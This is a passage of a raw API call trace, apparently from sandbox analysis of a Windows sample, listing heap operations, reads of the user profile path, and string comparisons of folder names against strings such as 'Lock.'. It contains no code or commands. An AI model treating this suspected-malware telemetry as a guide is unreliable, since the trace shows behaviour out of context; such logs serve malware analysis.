Size=0x10) returned 0x2aab128 [0219.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0219.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0219.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0219.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0219.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0219.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0219.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0219.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0219.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0219.196] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="My Videos", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0219.196] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="y Videos", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0219.196] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" Videos", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0219.196] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Videos", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0219.196] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ideos", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0219.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0219.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0219.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0219.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0219.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0219.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0219.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0219.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0219.196] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0219.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0219.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0219.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0219.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0219.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0219.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0219.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0219.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0219.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0219.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0219.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0219.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0219.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0219.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0219.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0219.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0219.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0219.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72318 [0219.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7100 [0219.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72328 [0219.197] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="My Videos", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0219.197] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="y Videos", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0219.197] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" Videos", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0219.197] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Videos", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0219.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0219.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0219.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0219.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0219.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0219.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0219.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0219.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0219.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0219.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0219.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0219.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0219.198] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0219.198] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f40 | out: hHeap=0x2af0000) returned 1 [0219.198] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0219.198] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0219.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0219.198] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0219.198] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0219.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0219.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0219.198] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0219.198] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0219.198] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0219.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0219.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71aa8 [0219.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0219.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0219.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0219.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0219.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0219.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0219.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0219.198] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0219.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0219.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0219.198] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0219.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0219.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0219.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaae70 [0219.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0219.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0219.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaff0 [0219.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0219.199] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0219.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0219.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0219.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0219.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0219.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0219.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0219.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0219.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0219.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0219.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0219.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0219.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0219.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0219.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0219.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7140 [0219.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0219.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x3854a10 [0219.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0219.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0219.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0219.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0219.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0219.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0219.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0219.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0219.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7140 | out: hHeap=0x2af0000) returned 1 [0219.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0219.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0219.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b78 [0219.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0219.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0219.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0219.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0219.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0219.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0219.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0219.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0219.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0219.200] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0219.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0219.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0219.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab0f8 [0219.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0219.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0219.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaf90 [0219.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0219.201] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0219.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0219.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0219.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0219.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0219.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0219.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0219.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0219.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0219.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0219.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0219.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0219.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0219.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0219.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0219.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7200 [0219.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0219.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x3854d58 [0219.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0219.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0219.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0219.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0219.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0219.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0219.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7200 | out: hHeap=0x2af0000) returned 1 [0219.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0219.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0219.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b58 [0219.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0219.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0219.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0219.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0219.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719f8 [0219.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0219.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0219.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0219.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab080 [0219.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0219.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0219.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0219.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0219.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0219.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0219.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0219.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0219.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0219.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0219.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0219.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0219.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0219.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0219.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0219.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0219.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0219.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0219.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0219.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0219.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0219.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0219.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0219.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0219.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0219.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0219.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0219.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0219.203] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0219.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0219.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0219.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0219.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0219.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0219.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0219.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0219.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0219.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0219.204] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0219.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0219.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0219.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0219.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0219.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0219.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0219.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0219.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0219.204] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0219.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0219.204] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0219.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0219.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0219.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0219.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0219.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0219.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0219.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0219.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0219.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0219.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0219.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 